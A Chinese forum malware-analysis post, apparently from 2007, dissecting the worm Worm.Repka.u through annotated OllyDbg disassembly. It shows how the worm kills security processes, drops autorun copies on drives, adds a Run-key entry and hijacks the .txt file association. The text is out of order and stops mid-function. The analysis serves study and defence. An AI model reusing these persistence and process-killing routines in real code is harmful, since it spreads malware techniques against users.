0040234D |. 83C4 08 ||ADD ESP,8
00402350 |. 85C0 ||TEST EAX,EAX
00402352 |. 75 18 ||JNZ SHORT A0002798.0040236C
00402354 |. 68 A4A14200 ||PUSH A0002798.0042A1A4 ; //这里OD看不见,用C32ASM分析的是碰上窗口有“杀”的就喀嚓
00402359 |. 8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
0040235F |. 52 ||PUSH EDX
00402360 |. E8 EB4A0000 ||CALL A0002798.00406E50
00402365 |. 83C4 08 ||ADD ESP,8
00402368 |. 85C0 ||TEST EAX,EAX
0040236A |. 74 2F ||JE SHORT A0002798.0040239B
0040236C |> 8BF4 ||MOV ESI,ESP
0040236E |. 6A 01 ||PUSH 1
00402370 |. 8BFC ||MOV EDI,ESP
00402372 |. 8B85 DCFEFFFF ||MOV EAX,DWORD PTR SS:[EBP-124]
00402378 |. 50 ||PUSH EAX ; /ProcessId
00402379 |. 6A 00 ||PUSH 0 ; |Inheritable = FALSE
0040237B |. 68 FF0F1F00 ||PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00402380 |. FF15 E0124300 ||CALL DWORD PTR DS:[<&KERNEL32.OpenProc>; \OpenProcess
00402386 |. 3BFC ||CMP EDI,ESP
00402388 |. E8 53440000 ||CALL A0002798.004067E0
0040238D |. 50 ||PUSH EAX ; |hProcess
0040238E |. FF15 DC124300 ||CALL DWORD PTR DS:[<&KERNEL32.Terminat>; \TerminateProcess
00402394 |. 3BF4 ||CMP ESI,ESP
00402396 |. E8 45440000 ||CALL A0002798.004067E0
0040239B |> 8D8D D4FEFFFF ||LEA ECX,DWORD PTR SS:[EBP-12C]
004023A1 |. 51 ||PUSH ECX ; /pProcessentry
004023A2 |. 8B55 FC ||MOV EDX,DWORD PTR SS:[EBP-4] ; |
004023A5 |. 52 ||PUSH EDX ; |hSnapshot
004023A6 |. E8 59010000 ||CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
004023AB |. 85C0 ||TEST EAX,EAX
004023AD |.^ 0F85 7EFEFFFF |\JNZ A0002798.00402231
004023B3 |. 8BF4 |MOV ESI,ESP
004023B5 |. 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
004023B8 |. 50 |PUSH EAX ; /hObject
004023B9 |. FF15 D4124300 |CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
004023BF |. 3BF4 |CMP ESI,ESP
004023C1 |. E8 1A440000 |CALL A0002798.004067E0
004023C6 |. 8BF4 |MOV ESI,ESP
004023C8 |. 6A 64 |PUSH 64 ; /Timeout = 100. ms
004023CA |. FF15 D0124300 |CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
004023D0 |. 3BF4 |CMP ESI,ESP
004023D2 |. E8 09440000 |CALL A0002798.004067E0
004023D7 |.^ E9 02FEFFFF \JMP A0002798.004021DE
004023DC |> 33C0 XOR EAX,EAX
004023DE |. 5F POP EDI
004023DF |. 5E POP ESI
004023E0 |. 5B POP EBX
004023E1 |. 81C4 70010000 ADD ESP,170
004023E7 |. 3BEC CMP EBP,ESP
004023E9 |. E8 F2430000 CALL A0002798.004067E0
004023EE |. 8BE5 MOV ESP,EBP
004023F0 |. 5D POP EBP
004023F1 \. C2 0400 RETN 4
0041365F . 51 PUSH ECX ; /Arg4
00413660 . 68 F8EB4200 PUSH A0002798.0042EBF8 ; |Arg3 = 0042EBF8
00413665 . 68 80A14200 PUSH A0002798.0042A180 ; |; |Arg2 = 0042A180 ASCII "%sexplorer.exe %s" //看来又对EXPLORER做了手脚,估计是插入线程
0041366A . 8D95 ACFDFFFF LEA EDX,DWORD PTR SS:[EBP-254] ; |
00413670 . 52 PUSH EDX ; |Arg1
00413671 . E8 8A2FFFFF CALL A0002798.00406600 ; \A0002798.00406600
00413676 . 83C4 10 ADD ESP,10
00413679 . 8BF4 MOV ESI,ESP
0041367B . 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
0041367E . 50 PUSH EAX ; /pProcessInfo
0041367F . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00413682 . 51 PUSH ECX ; |pStartupInfo
00413683 . 6A 00 PUSH 0 ; |CurrentDir = NULL
00413685 . 6A 00 PUSH 0 ; |pEnvironment = NULL
00413687 . 6A 20 PUSH 20 ; |CreationFlags = NORMAL_PRIORITY_CLASS
00413689 . 6A 00 PUSH 0 ; |InheritHandles = FALSE
0041368B . 6A 00 PUSH 0 ; |pThreadSecurity = NULL
0041368D . 6A 00 PUSH 0 ; |pProcessSecurity = NULL
0041368F . 8D95 ACFDFFFF LEA EDX,DWORD PTR SS:[EBP-254] ; |
00413695 . 52 PUSH EDX ; |CommandLine
00413696 . 6A 00 PUSH 0 ; |ModuleFileName = NULL
00413698 . FF15 F8124300 CALL DWORD PTR DS:[<&KERNEL32.CreateProc>; \CreateProcessA
0041369E . 3BF4 CMP ESI,ESP
004136A0 . E8 3B31FFFF CALL A0002798.004067E0
004136A5 > 8BF4 MOV ESI,ESP
004136A7 . FF15 60134300 CALL DWORD PTR DS:[<&KERNEL32.GetCommand>; [GetCommandLineA
004136AD . 3BF4 CMP ESI,ESP
004136AF . E8 2C31FFFF CALL A0002798.004067E0
004136B4 . 8985 A4FDFFFF MOV DWORD PTR SS:[EBP-25C],EAX ; 我们的TXT文档……
004136BA . 68 3CA04200 PUSH A0002798.0042A03C ; ASCII ".txt"
004136BF . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
004136C5 . 50 PUSH EAX
004136C6 . E8 8537FFFF CALL A0002798.00406E50
004136CB . 83C4 08 ADD ESP,8
004136CE . 85C0 TEST EAX,EAX
004136D0 . 75 1C JNZ SHORT A0002798.004136EE
004136D2 . 68 28A04200 PUSH A0002798.0042A028 ; ASCII ".TXT"
004136D7 . 8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]
004136DD . 51 PUSH ECX
004136DE . E8 6D37FFFF CALL A0002798.00406E50
004136E3 . 83C4 08 ADD ESP,8
004136E6 . 85C0 TEST EAX,EAX
004136E8 . 0F84 5E010000 JE A0002798.0041384C
004136EE > C785 9CFCFFFF>MOV DWORD PTR SS:[EBP-364],0
004136F8 . EB 0F JMP SHORT A0002798.00413709
004136FA > 8B95 9CFCFFFF MOV EDX,DWORD PTR SS:[EBP-364]
00413700 . 83C2 01 ADD EDX,1
00413703 . 8995 9CFCFFFF MOV DWORD PTR SS:[EBP-364],EDX
00413709 > 81BD 9CFCFFFF>CMP DWORD PTR SS:[EBP-364],0DC
00413713 . 0F8D B5000000 JGE A0002798.004137CE
00413719 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
0041371F . 0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
00413725 . 8B8D 9CFCFFFF MOV ECX,DWORD PTR SS:[EBP-364]
0041372B . 8A50 20 MOV DL,BYTE PTR DS:[EAX+20]
0041372E . 88940D A4FCFF>MOV BYTE PTR SS:[EBP+ECX-35C],DL
00413735 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
0041373B . 0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
00413741 . 8A48 1D MOV CL,BYTE PTR DS:[EAX+1D]
00413744 . 888D A0FCFFFF MOV BYTE PTR SS:[EBP-360],CL
0041374A . 8B95 A4FDFFFF MOV EDX,DWORD PTR SS:[EBP-25C]
00413750 . 0395 9CFCFFFF ADD EDX,DWORD PTR SS:[EBP-364]
00413756 . 8A42 1E MOV AL,BYTE PTR DS:[EDX+1E]
00413759 . 8885 A1FCFFFF MOV BYTE PTR SS:[EBP-35F],AL
0041375F . 8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]
00413765 . 038D 9CFCFFFF ADD ECX,DWORD PTR SS:[EBP-364]
0041376B . 8A51 1F MOV DL,BYTE PTR DS:[ECX+1F]
0041376E . 8895 A2FCFFFF MOV BYTE PTR SS:[EBP-35E],DL
00413774 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
0041377A . 0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
00413780 . 8A48 20 MOV CL,BYTE PTR DS:[EAX+20]
00413783 . 888D A3FCFFFF MOV BYTE PTR SS:[EBP-35D],CL
00413789 . 68 3CA04200 PUSH A0002798.0042A03C ; ASCII ".txt"
0041378E . 8D95 A0FCFFFF LEA EDX,DWORD PTR SS:[EBP-360]
00413794 . 52 PUSH EDX
00413795 . E8 B636FFFF CALL A0002798.00406E50
0041379A . 83C4 08 ADD ESP,8
0041379D . 85C0 TEST EAX,EAX
0041379F . 75 18 JNZ SHORT A0002798.004137B9
004137A1 . 68 28A04200 PUSH A0002798.0042A028 ; ASCII ".TXT"
004137A6 . 8D85 A0FCFFFF LEA EAX,DWORD PTR SS:[EBP-360]
004137AC . 50 PUSH EAX
004137AD . E8 9E36FFFF CALL A0002798.00406E50
004137B2 . 83C4 08 ADD ESP,8
004137B5 . 85C0 TEST EAX,EAX
004137B7 . 74 10 JE SHORT A0002798.004137C9
004137B9 > 8B8D 9CFCFFFF MOV ECX,DWORD PTR SS:[EBP-364]
004137BF . C6840D A5FCFF>MOV BYTE PTR SS:[EBP+ECX-35B],0
004137C7 . EB 05 JMP SHORT A0002798.004137CE
004137C9 >^ E9 2CFFFFFF JMP A0002798.004136FA
004137CE > 8D95 A4FCFFFF LEA EDX,DWORD PTR SS:[EBP-35C]
004137D4 . 52 PUSH EDX
004137D5 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
004137DB . 50 PUSH EAX
004137DC . E8 3F30FFFF CALL A0002798.00406820
004137E1 . 83C4 08 ADD ESP,8
004137E4 . 8BF4 MOV ESI,ESP
004137E6 . 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL
004137E8 . 6A 00 PUSH 0 ; |Title = NULL
004137EA . 8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C] ; |
004137F0 . 51 PUSH ECX ; |Text
004137F1 . 6A 00 PUSH 0 ; |hOwner = NULL
004137F3 . FF15 78144300 CALL DWORD PTR DS:[<&USER32.MessageBoxA>>; \MessageBoxA
004137F9 . 3BF4 CMP ESI,ESP
004137FB . E8 E02FFFFF CALL A0002798.004067E0
00413800 . 8B95 A4FDFFFF MOV EDX,DWORD PTR SS:[EBP-25C]
00413806 . 52 PUSH EDX ; /Arg4
00413807 . 68 F8EB4200 PUSH A0002798.0042EBF8 ; |Arg3 = 0042EBF8
0041380C . 68 5CA14200 PUSH A0002798.0042A15C ; ||Arg2 = 0042A15C ASCII "%snotepad.exe %s" //该NOTEPAD倒霉了
00413811 . 8D85 ACFDFFFF LEA EAX,DWORD PTR SS:[EBP-254] ; |
00413817 . 50 PUSH EAX ; |Arg1
00413818 . E8 E32DFFFF CALL A0002798.00406600 ; \A0002798.00406600
--------------------------------------------------------------------------------
【经验总结】
终于分析完了,555555555,刚才点了个F4,幸好没直接在关键部分,否则…………
呵呵:)希望斑竹鼓励新人,能+个声望(您上次扣了一个,将功补过:P)要不然就【我都不敢写了,上次这么写CCD就骂我来着:( 如果您觉得怎么样,就怎么样吧,别又扣一个:)】
--------------------------------------------------------------------------------
【版权声明】: 本文原创于看雪技术论坛, 转载请注明作者并保持文章的完整, 谢谢!
2007年06月03日 下午 10:35:08
(PS:别又扣声望,我还指望这篇文章让我的声望提高到10呢!)
【文章标题】: Worm.Repka.u病毒分析
【文章作者】: NoName剑人
【作者邮箱】: wangjunyi2008@sina.com
【作者主页】: 无
【作者QQ号】: 464252600(请注明-破解-)
【软件名称】: Worm.Repka.u
【软件大小】: 204KB
【下载地址】: 自己搜索下载或见附件
【加壳方式】: 无壳
【保护方式】: 利用API来杀掉别的进程以防止被×
【编写语言】: VC++
【使用工具】: C32ASM OD
【操作平台】: XP上成功
【软件介绍】: 虫子病毒:p
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
晕,累死我了。我可能是CRACKER里最小的了,初中……最近几天有高考,所以把双休日放到789三天了,我们已经学了10天
没休息了(汗~)
废话少说,咱来看看这个病毒,那是几年前的老病毒了,没什么威力(哪高人去整PANDA去?)所以才敢从病毒库里翻出来
首先用QUICK UNPACK(好用的查壳软件,但是脱壳在我机器上一次没实现过。人品问题?),无壳。
然后用C32ASM(0D老看不见中文……)看,找到几个病毒代码集中的地方,分析:
00401850 /> \55 PUSH EBP
00401851 |. 8BEC MOV EBP,ESP
00401853 |. 81EC 70010000 SUB ESP,170
00401859 |. 53 PUSH EBX
0040185A |. 56 PUSH ESI
0040185B |. 57 PUSH EDI
0040185C |. 8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
00401862 |. B9 5C000000 MOV ECX,5C
00401867 |. B8 CCCCCCCC MOV EAX,CCCCCCCC
0040186C |. F3:AB REP STOS DWORD PTR ES:[EDI]
0040186E |. 8BF4 MOV ESI,ESP
00401870 |. 68 00ED4200 PUSH A0002798.0042ED00 ; /pThreadId = A0002798.0042ED00
00401875 |. 6A 00 PUSH 0 ; |CreationFlags = 0
00401877 |. 6A 00 PUSH 0 ; |pThreadParm = NULL
00401879 |. 68 2D104000 PUSH A0002798.0040102D ; |ThreadFunction = A0002798.0040102D
0040187E |. 6A 00 PUSH 0 ; |StackSize = 0
00401880 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401882 |. FF15 4C134300 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread?释放?
00401888 |. 3BF4 CMP ESI,ESP
0040188A |. E8 514F0000 CALL A0002798.004067E0
0040188F |. A3 F8EC4200 MOV DWORD PTR DS:[42ECF8],EAX
00401894 |. C745 FC 04000>MOV DWORD PTR SS:[EBP-4],4
0040189B |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63
0040189F |. 833D 0CEE4200>CMP DWORD PTR DS:[42EE0C],0
004018A6 |. 0F85 21020000 JNZ A0002798.00401ACD
004018AC |. 8BF4 MOV ESI,ESP
004018AE |. FF15 C4124300 CALL DWORD PTR DS:[<&KERNEL32.GetLogical>; [GetLogicalDrives
004018B4 |. 3BF4 CMP ESI,ESP
004018B6 |. E8 254F0000 CALL A0002798.004067E0
004018BB |. 8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
004018C1 |. C785 F0FEFFFF>MOV DWORD PTR SS:[EBP-110],0
004018CB |. EB 0F JMP SHORT A0002798.004018DC
004018CD |> 8B85 F0FEFFFF /MOV EAX,DWORD PTR SS:[EBP-110]
004018D3 |. 83C0 01 |ADD EAX,1
004018D6 |. 8985 F0FEFFFF |MOV DWORD PTR SS:[EBP-110],EAX
004018DC |> 83BD F0FEFFFF> CMP DWORD PTR SS:[EBP-110],20
004018E3 |. 0F8D 05010000 |JGE A0002798.004019EE
004018E9 |. 8B8D F4FEFFFF |MOV ECX,DWORD PTR SS:[EBP-10C]
004018EF |. 234D FC |AND ECX,DWORD PTR SS:[EBP-4]
004018F2 |. 85C9 |TEST ECX,ECX
004018F4 |. 0F84 DE000000 |JE A0002798.004019D8
004018FA |. 68 DCA04200 |PUSH A0002798.0042A0DC ; / ASCII ":\reper.exe" //这个应该是释放文件
004018FF |. 0FBE55 F8 |MOVSX EDX,BYTE PTR SS:[EBP-8] ; |
00401903 |. 52 |PUSH EDX ; |Arg3
00401904 |. 68 74A14200 |PUSH A0002798.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s"
00401909 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] ; |
0040190F |. 50 |PUSH EAX ; |Arg1
00401910 |. E8 EB4C0000 |CALL A0002798.00406600 ; \A0002798.00406600
00401915 |. 83C4 10 |ADD ESP,10
00401918 |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
0040191E |. 51 |PUSH ECX
0040191F |. E8 04F7FFFF |CALL A0002798.00401028
00401924 |. 83C4 04 |ADD ESP,4
00401927 |. 3B05 10EE4200 |CMP EAX,DWORD PTR DS:[42EE10]
0040192D |. 74 1E |JE SHORT A0002798.0040194D
0040192F |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401935 |. 52 |PUSH EDX
00401936 |. E8 D9F6FFFF |CALL A0002798.00401014
0040193B |. 83C4 04 |ADD ESP,4
0040193E |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
00401944 |. 50 |PUSH EAX ; /Arg1
00401945 |. E8 C64F0000 |CALL A0002798.00406910 ; \A0002798.00406910
0040194A |. 83C4 04 |ADD ESP,4
0040194D |> 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
00401953 |. 51 |PUSH ECX
00401954 |. E8 B1F6FFFF |CALL A0002798.0040100A
00401959 |. 83C4 04 |ADD ESP,4
0040195C |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401962 |. 52 |PUSH EDX
00401963 |. E8 A7F6FFFF |CALL A0002798.0040100F
00401968 |. 83C4 04 |ADD ESP,4
0040196B |. 68 6CA04200 |PUSH A0002798.0042A06C ; / ASCII ":\AUTORUN.exe" //这个也应该是释放文件
00401970 |. 0FBE45 F8 |MOVSX EAX,BYTE PTR SS:[EBP-8] ; |
00401974 |. 50 |PUSH EAX ; |Arg3
00401975 |. 68 74A14200 |PUSH A0002798.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s"
0040197A |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] ; |
00401980 |. 51 |PUSH ECX ; |Arg1
00401981 |. E8 7A4C0000 |CALL A0002798.00406600 ; \A0002798.00406600
00401986 |. 83C4 10 |ADD ESP,10
00401989 |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
0040198F |. 52 |PUSH EDX
00401990 |. E8 A2F6FFFF |CALL A0002798.00401037
00401995 |. 83C4 04 |ADD ESP,4
00401998 |. 85C0 |TEST EAX,EAX
0040199A |. 75 1E |JNZ SHORT A0002798.004019BA
0040199C |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019A2 |. 50 |PUSH EAX
004019A3 |. E8 6CF6FFFF |CALL A0002798.00401014
004019A8 |. 83C4 04 |ADD ESP,4
004019AB |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
004019B1 |. 51 |PUSH ECX ; /Arg1
004019B2 |. E8 594F0000 |CALL A0002798.00406910 ; \A0002798.00406910
004019B7 |. 83C4 04 |ADD ESP,4
004019BA |> 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
004019C0 |. 52 |PUSH EDX
004019C1 |. E8 3FF6FFFF |CALL A0002798.00401005
004019C6 |. 83C4 04 |ADD ESP,4
004019C9 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019CF |. 50 |PUSH EAX
004019D0 |. E8 3AF6FFFF |CALL A0002798.0040100F
004019D5 |. 83C4 04 |ADD ESP,4
004019D8 |> 8B4D FC |MOV ECX,DWORD PTR SS:[EBP-4]
004019DB |. D1E1 |SHL ECX,1
004019DD |. 894D FC |MOV DWORD PTR SS:[EBP-4],ECX
004019E0 |. 8A55 F8 |MOV DL,BYTE PTR SS:[EBP-8]
004019E3 |. 80C2 01 |ADD DL,1
004019E6 |. 8855 F8 |MOV BYTE PTR SS:[EBP-8],DL
004019E9 |.^ E9 DFFEFFFF \JMP A0002798.004018CD
004019EE |> 68 44A14200 PUSH A0002798.0042A144 ; / ASCII "VIEWER.exe" //这个还应该是释放文件
004019F3 |. 68 F8EB4200 PUSH A0002798.0042EBF8 ; |Arg3 = 0042EBF8
004019F8 |. 68 30A04200 PUSH A0002798.0042A030 ; |Arg2 = 0042A030 ASCII "%s%s"
004019FD |. 68 F8EA4200 PUSH A0002798.0042EAF8 ; |Arg1 = 0042EAF8
00401A02 |. E8 F94B0000 CALL A0002798.00406600 ; \A0002798.00406600
00401A07 |. 83C4 10 ADD ESP,10
00401A0A |. 68 F8EA4200 PUSH A0002798.0042EAF8
00401A0F |. E8 14F6FFFF CALL A0002798.00401028
00401A14 |. 83C4 04 ADD ESP,4
00401A17 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A1D |. 74 1A JE SHORT A0002798.00401A39
00401A1F |. 68 F8EA4200 PUSH A0002798.0042EAF8
00401A24 |. E8 EBF5FFFF CALL A0002798.00401014
00401A29 |. 83C4 04 ADD ESP,4
00401A2C |. 68 F8EA4200 PUSH A0002798.0042EAF8 ; /Arg1 = 0042EAF8
00401A31 |. E8 DA4E0000 CALL A0002798.00406910 ; \A0002798.00406910
00401A36 |. 83C4 04 ADD ESP,4
00401A39 |> 68 F8EA4200 PUSH A0002798.0042EAF8
00401A3E |. E8 C7F5FFFF CALL A0002798.0040100A
00401A43 |. 83C4 04 ADD ESP,4
00401A46 |. 68 F8EA4200 PUSH A0002798.0042EAF8
00401A4B |. E8 C4F5FFFF CALL A0002798.00401014
00401A50 |. 83C4 04 ADD ESP,4
00401A53 |. 68 F8EB4200 PUSH A0002798.0042EBF8 ; /Arg3 = 0042EBF8
00401A58 |. 68 2CA14200 PUSH A0002798.0042A12C ; | ASCII "%ssystem32\NOTEPAD.EXE" //这个应该hai是释放文件
00401A5D |. 68 F8E94200 PUSH A0002798.0042E9F8 ; |Arg1 = 0042E9F8
00401A62 |. E8 994B0000 CALL A0002798.00406600 ; \A0002798.00406600
00401A67 |. 83C4 0C ADD ESP,0C
00401A6A |. 68 F8E94200 PUSH A0002798.0042E9F8
00401A6F |. E8 B4F5FFFF CALL A0002798.00401028
00401A74 |. 83C4 04 ADD ESP,4
00401A77 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A7D |. 74 1A JE SHORT A0002798.00401A99
00401A7F |. 68 F8E94200 PUSH A0002798.0042E9F8
00401A84 |. E8 8BF5FFFF CALL A0002798.00401014
00401A89 |. 83C4 04 ADD ESP,4
00401A8C |. 68 F8E94200 PUSH A0002798.0042E9F8 ; /Arg1 = 0042E9F8
00401A91 |. E8 7A4E0000 CALL A0002798.00406910 ; \A0002798.00406910
00401A96 |. 83C4 04 ADD ESP,4
00401A99 |> 68 F8E94200 PUSH A0002798.0042E9F8
00401A9E |. E8 67F5FFFF CALL A0002798.0040100A
00401AA3 |. 83C4 04 ADD ESP,4
00401AA6 |. 68 F8E94200 PUSH A0002798.0042E9F8
00401AAB |. E8 64F5FFFF CALL A0002798.00401014
00401AB0 |. 83C4 04 ADD ESP,4
00401AB3 |. 68 50B34200 PUSH A0002798.0042B350
00401AB8 |. E8 4DF5FFFF CALL A0002798.0040100A
00401ABD |. 83C4 04 ADD ESP,4
00401AC0 |. 68 50B34200 PUSH A0002798.0042B350
00401AC5 |. E8 4AF5FFFF CALL A0002798.00401014
00401ACA |. 83C4 04 ADD ESP,4
00401ACD |> A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401AD2 |. 83C0 01 ADD EAX,1
00401AD5 |. A3 0CEE4200 MOV DWORD PTR DS:[42EE0C],EAX
00401ADA |. A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401ADF |. 99 CDQ
00401AE0 |. B9 05000000 MOV ECX,5
00401AE5 |. F7F9 IDIV ECX
00401AE7 |. 8915 0CEE4200 MOV DWORD PTR DS:[42EE0C],EDX
00401AED |. C785 ECFEFFFF>MOV DWORD PTR SS:[EBP-114],A0002798.0042>
00401AF7 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],A0002798.0042>; 干坏事了! ASCII "Software\Microsoft\Windows\CurrentVersion\Run"写注册表
00401B01 |. 8BF4 MOV ESI,ESP ; 写注册表取得开机运行权
00401B03 |. 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118]
00401B09 |. 52 PUSH EDX ; /pHandle
00401B0A |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE
00401B0F |. 6A 00 PUSH 0 ; |Reserved = 0
00401B11 |. 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] ; |
00401B17 |. 50 PUSH EAX ; |Subkey
00401B18 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401B1D |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401B23 |. 3BF4 CMP ESI,ESP
00401B25 |. E8 B64C0000 CALL A0002798.004067E0
00401B2A |. 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX
00401B30 |. 8B8D ECFEFFFF MOV ECX,DWORD PTR SS:[EBP-114]
00401B36 |. 51 PUSH ECX
00401B37 |. E8 C44B0000 CALL A0002798.00406700
00401B3C |. 83C4 04 ADD ESP,4
00401B3F |. 8BF4 MOV ESI,ESP
00401B41 |. 50 PUSH EAX ; /BufSize
00401B42 |. 8B95 ECFEFFFF MOV EDX,DWORD PTR SS:[EBP-114] ; |
00401B48 |. 52 PUSH EDX ; |Buffer
00401B49 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00401B4B |. 6A 00 PUSH 0 ; |Reserved = 0
00401B4D |. 68 ACA04200 PUSH A0002798.0042A0AC ; |ValueName = "runreper"
00401B52 |. 8B85 E8FEFFFF MOV EAX,DWORD PTR SS:[EBP-118] ; |
00401B58 |. 50 PUSH EAX ; |hKey
00401B59 |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401B5F |. 3BF4 CMP ESI,ESP
00401B61 |. E8 7A4C0000 CALL A0002798.004067E0
00401B66 |. 8985 DCFEFFFF MOV DWORD PTR SS:[EBP-124],EAX
00401B6C |. 8BF4 MOV ESI,ESP
00401B6E |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]
00401B74 |. 51 PUSH ECX ; /hKey
00401B75 |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401B7B |. 3BF4 CMP ESI,ESP
00401B7D |. E8 5E4C0000 CALL A0002798.004067E0 ; 又改TXT的关联
00401B82 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],A0002798.0042>; ASCII "txtfile\shell\open\command"
00401B8C |. C785 D8FEFFFF>MOV DWORD PTR SS:[EBP-128],A0002798.0042>
00401B96 |. 68 68A04200 PUSH A0002798.0042A068 ; ASCII " %1"
00401B9B |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BA1 |. 52 PUSH EDX
00401BA2 |. E8 894C0000 CALL A0002798.00406830
00401BA7 |. 83C4 08 ADD ESP,8
00401BAA |. 8BF4 MOV ESI,ESP
00401BAC |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118]
00401BB2 |. 50 PUSH EAX ; /pHandle
00401BB3 |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE
00401BB8 |. 6A 00 PUSH 0 ; |Reserved = 0
00401BBA |. 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] ; |
00401BC0 |. 51 PUSH ECX ; |Subkey
00401BC1 |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
00401BC6 |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401BCC |. 3BF4 CMP ESI,ESP
00401BCE |. E8 0D4C0000 CALL A0002798.004067E0
00401BD3 |. 8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX
00401BD9 |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BDF |. 52 PUSH EDX
00401BE0 |. E8 1B4B0000 CALL A0002798.00406700
00401BE5 |. 83C4 04 ADD ESP,4
00401BE8 |. 8BF4 MOV ESI,ESP
00401BEA |. 50 PUSH EAX ; /BufSize
00401BEB |. 8B85 D8FEFFFF MOV EAX,DWORD PTR SS:[EBP-128] ; |
00401BF1 |. 50 PUSH EAX ; |Buffer
00401BF2 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ
00401BF4 |. 6A 00 PUSH 0 ; |Reserved = 0
00401BF6 |. 6A 00 PUSH 0 ; |ValueName = NULL
00401BF8 |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] ; |
00401BFE |. 51 PUSH ECX ; |hKey
00401BFF |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401C05 |. 3BF4 CMP ESI,ESP
00401C07 |. E8 D44B0000 CALL A0002798.004067E0
00401C0C |. 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX
00401C12 |. 8BF4 MOV ESI,ESP
00401C14 |. 8B95 E8FEFFFF MOV EDX,DWORD PTR SS:[EBP-118]
00401C1A |. 52 PUSH EDX ; /hKey
00401C1B |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C21 |. 3BF4 CMP ESI,ESP
00401C23 |. E8 B84B0000 CALL A0002798.004067E0
00401C28 |. 5F POP EDI
00401C29 |. 5E POP ESI
00401C2A |. 5B POP EBX
00401C2B |. 81C4 70010000 ADD ESP,170
00401C31 |. 3BEC CMP EBP,ESP
00401C33 |. E8 A84B0000 CALL A0002798.004067E0
00401C38 |. 8BE5 MOV ESP,EBP
00401C3A |. 5D POP EBP
00401C3B \. C2 1000 RETN 10
在里面分析了,我也不写了……
还有
00401FF0 > \55 PUSH EBP
00401FF1 . 8BEC MOV EBP,ESP
00401FF3 . 6A FF PUSH -1
